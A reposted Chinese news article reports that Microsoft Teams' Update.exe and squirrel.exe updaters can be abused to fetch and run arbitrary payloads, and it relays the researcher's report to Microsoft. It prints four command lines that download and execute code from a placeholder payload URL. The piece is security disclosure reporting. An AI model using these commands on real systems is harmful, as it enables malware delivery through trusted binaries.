雷锋网(公众号:雷锋网)消息,据 BleepingComputer 美国时间 6 月 29 日报道,多位安全研究人员发现当前在Microsoft Teams桌面应用中实现的“update”升级机制允许黑客在系统上下载和执行任意文件,
研究人员表示,对易受攻击的应用程序使用“update”命令可以在当前用户的上下文中执行任意二进制文件。目前,研究人员已向微软报告了这个问题。
使用Microsoft Teams,将有效负载添加到其文件夹中,并使用以下任一命令自动执行:
Update.exe –update [url to payload]
squirrel.exe –update [url to payload]
这些命令可以与其他参数一起使用,包括“download”,它允许从远程位置以NuGet包的形式检索有效负载。
Update.exe –download [url to payload]
squirrel.exe –download [url to payload]
相同的方法适用于“squirrel.exe”,它也是Microsoft Teams安装包的一部分。这两个可执行文件现在都是GitHub上的Living Off The Land Binaries and Scripts(LOLBAS)数据库的一部分。
安全研究员 Reegun Richard 在 6 月 4 日向微软团队报告了这个问题。此时,应用程序仍然容易受到攻击,因为微软通知研究员该修复程序将在未来的软件版本中出现。
来源:BleepingComputer 。
雷锋网版权文章,未经授权禁止转载。详情见。
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/117758.html